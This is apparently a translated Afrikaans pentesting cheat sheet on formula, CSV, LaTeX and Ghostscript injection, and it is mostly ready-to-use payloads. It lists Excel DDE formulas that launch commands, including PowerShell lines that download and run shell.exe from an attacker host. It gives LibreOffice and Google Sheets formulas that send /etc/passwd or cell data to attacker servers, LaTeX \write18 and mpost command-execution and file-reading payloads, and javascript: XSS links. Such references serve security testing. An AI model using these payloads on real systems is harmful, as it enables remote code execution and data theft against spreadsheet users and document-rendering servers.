Formula/CSV/Doc/LaTeX/GhostScript Injection

Formula Injection

Info

As jou invoer binne CSV lêers (of enige ander lêer wat waarskynlik deur Excel geopen gaan word) reflekteer word, kan jy dalk Excel formules plaas wat uitgevoer sal word wanneer die gebruiker die lêer open of wanneer die gebruiker op 'n skakel binne die excel bladsy klik.

Wordlist

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

Hyperlink

Die volgende voorbeeld is baie nuttig om inhoud uit die finale excel-skaak te onttrek en om versoeke na arbitrêre plekke te doen. Maar dit vereis dat die gebruiker op die skakel klik (en die waarskuwingstoets aanvaar).

Die volgende voorbeeld is geneem van https://payatu.com/csv-injection-basic-to-exploit

Stel jou 'n sekuriteitsbreuk in 'n Student Record Management-stelsel voor wat deur 'n CSV-inspuitaanval uitgebuit word. Die aanvaller se primêre bedoeling is om die stelsel wat deur onderwysers gebruik word om student besonderhede te bestuur, te kompromitteer. Die metode behels dat die aanvaller 'n kwaadwillige payload in die toepassing inspuit, spesifiek deur skadelike formules in velde wat vir student besonderhede bedoel is, in te voer. Die aanval ontvou soos volg:

1. Inspuiting van Kwaadwillige Payload:

• Die aanvaller dien 'n student besonderhede vorm in, maar sluit 'n formule in wat algemeen in sigblad gebruik word (bv. =HYPERLINK("<malicious_link>","Click here")).

• Hierdie formule is ontwerp om 'n hyperlink te skep, maar dit wys na 'n kwaadwillige bediener wat deur die aanvaller beheer word.

2. Eksportering van Gecompromitteerde Data:

• Onderwysers, onbewus van die kompromie, gebruik die toepassing se funksionaliteit om die data in 'n CSV-lêer te eksporteer.

• Die CSV-lêer, wanneer dit geopen word, bevat steeds die kwaadwillige payload. Hierdie payload verskyn as 'n klikbare hyperlink in die sigblad.

3. Triggering van die Aanval:

• 'n Onderwyser klik op die hyperlink, in die geloof dat dit 'n legitieme deel van die student se besonderhede is.

• By die klik word sensitiewe data (potensieel insluitend besonderhede van die sigblad of die onderwyser se rekenaar) na die aanvaller se bediener oorgedra.

4. Teken van die Data:

• Die aanvaller se bediener ontvang en teken die sensitiewe data wat van die onderwyser se rekenaar gestuur is.

• Die aanvaller kan dan hierdie data vir verskeie kwaadwillige doeleindes gebruik, wat die privaatheid en sekuriteit van die studente en die instelling verder kompromitteer.

RCE

Kyk na die oorspronklike pos vir verdere besonderhede.

In spesifieke konfigurasies of ouer weergawes van Excel kan 'n funksie genaamd Dynamic Data Exchange (DDE) uitgebuit word om arbitrêre opdragte uit te voer. Om hiervan gebruik te maak, moet die volgende instellings geaktiveer word:

• Navigeer na File → Options → Trust Center → Trust Center Settings → External Content, en aktiveer Dynamic Data Exchange Server Launch.

Wanneer 'n sigblad met die kwaadwillige payload geopen word (en as die gebruiker die waarskuwings aanvaar), word die payload uitgevoer. Byvoorbeeld, om die sakrekenaar-toepassing te begin, sou die payload wees:

=cmd|' /C calc'!xxx

Aanvullende opdragte kan ook uitgevoer word, soos om 'n lêer af te laai en uit te voer met PowerShell:

=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Plaaslike Lêer Insluiting (LFI) in LibreOffice Calc

LibreOffice Calc kan gebruik word om plaaslike lêers te lees en data te exfiltreer. Hier is 'n paar metodes:

• Lees die eerste lyn van die plaaslike /etc/passwd lêer: ='file:///etc/passwd'#$passwd.A1

• Exfiltreer die geleesde data na 'n aanvaller-beheerde bediener: =WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))

• Exfiltreer meer as een lyn: =WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))

• DNS exfiltrasie (stuur geleesde data as DNS navrae na 'n aanvaller-beheerde DNS bediener): =WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))

Google Sheets vir Out-of-Band (OOB) Data Exfiltrasie

Google Sheets bied funksies wat uitgebuit kan word vir OOB data exfiltrasie:

• CONCATENATE: Voeg strings saam - =CONCATENATE(A2:E2)

• IMPORTXML: Importeer data van gestruktureerde datatipes - =IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")

• IMPORTFEED: Importeer RSS of ATOM feeds - =IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))

• IMPORTHTML: Importeer data van HTML tabelle of lyste - =IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)

• IMPORTRANGE: Importeer 'n reeks selle van 'n ander sigblad - =IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")

• IMAGE: Voeg 'n beeld in 'n sel in - =IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")

LaTeX Inspuiting

Gewoonlik gebruik die bedieners wat op die internet gevind word wat LaTeX kode na PDF omskakel pdflatex. Hierdie program gebruik 3 hoofkenmerke om (nie)opdraguitvoering toe te laat nie:

• --no-shell-escape: Deaktiveer die \write18{command} konstruksie, selfs al is dit geaktiveer in die texmf.cnf lêer.

• --shell-restricted: Dieselfde as --shell-escape, maar beperk tot 'n 'veilige' stel voorgedefinieerde **opdragte (**Op Ubuntu 16.04 is die lys in /usr/share/texmf/web2c/texmf.cnf).

• --shell-escape: Aktiveer die \write18{command} konstruksie. Die opdrag kan enige skulpopdrag wees. Hierdie konstruksie word normaalweg om veiligheidsredes verbied.

Daar is egter ander maniere om opdragte uit te voer, so om RCE te vermy is dit baie belangrik om --shell-restricted te gebruik.

Lees lêer

Jy mag dalk die inspuiting met wrappers soos [ of $ moet aanpas.

\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Lees enkellyn lêer

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Lees 'n veellyn lêer

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file

Skryf lêer

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Opdrag uitvoering

Die invoer van die opdrag sal na stdin herlei word, gebruik 'n tydelike lêer om dit te verkry.

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

As jy enige LaTex-fout kry, oorweeg dit om base64 te gebruik om die resultaat sonder slegte karakters te verkry.

\immediate\write18{env | base64 > test.tex}
\input{text.tex}

\input|ls|base4
\input{|"/bin/hostname"}

Cross Site Scripting

Van @EdOverflow

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

Ghostscript Injection

Kontroleer https://blog.redteam-pentesting.de/2023/ghostscript-overview/

Verwysings

• https://notsosecure.com/data-exfiltration-formula-injection-part1

• https://0day.work/hacking-with-latex/

• https://salmonsec.com/cheatsheet/latex_injection

• https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/